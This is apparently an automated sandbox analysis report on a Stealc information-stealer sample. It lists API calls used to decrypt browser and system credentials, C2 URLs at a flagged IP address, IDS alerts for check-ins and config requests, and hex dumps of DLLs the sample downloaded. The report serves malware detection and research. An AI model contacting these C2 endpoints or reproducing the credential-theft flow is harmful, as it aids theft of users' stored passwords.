Instruction ID: efa475ab5a7a712fee8c0ca4daf36b382a40f542427f4f7cd37a0e3b14541906
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: CA1136F3E0031557DF0089FADC856AF77D99F99268F280234ED6487381F23599098BE1

Function 6C650F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5F2AF5,?,?,?,?,?,6C5F0A1B,00000000), ref: 6C650F1A
malloc.MOZGLUE(00000001), ref: 6C650F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C650F42
TlsGetValue.KERNEL32 ref: 6C650F5B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 6bd615cca45649abfbe880a033cc6a63a31cad3cb05a5978f4af29cbd2133465
Instruction ID: b7c97d9b5b61796bc0dccb12408fa1f40fbabce7443be28528550853c2927881
Opcode Fuzzy Hash: 6bd615cca45649abfbe880a033cc6a63a31cad3cb05a5978f4af29cbd2133465
Instruction Fuzzy Hash: 1E01F0B1F0025057E7102B3E9E0459676ACEF8635DF514576DC4CC2A11DF31C855C6D6

Source: http://40.86.87.10/108e010e8f91c38c.php%	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php(	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php9	Avira URL Cloud: Label: malware
Source: http://40.86.87.10	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php2	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllowser	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll$	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php~	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllL	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phposition:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpe	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpirefox	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllllU	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpI	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllQ	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php-LTC	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE9560 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00EE9560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE94C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00EE94C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE6C40 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00EE6C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF6DB0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00EF6DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEBFC0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00EEBFC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C634440 PK11_PrivDecrypt,	0_2_6C634440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C604420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C604420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6344C0 PK11_PubEncrypt,	0_2_6C6344C0

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 40.86.87.10:80 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 40.86.87.10:80 -> 192.168.2.4:49730

Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php
Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:08 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:11 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
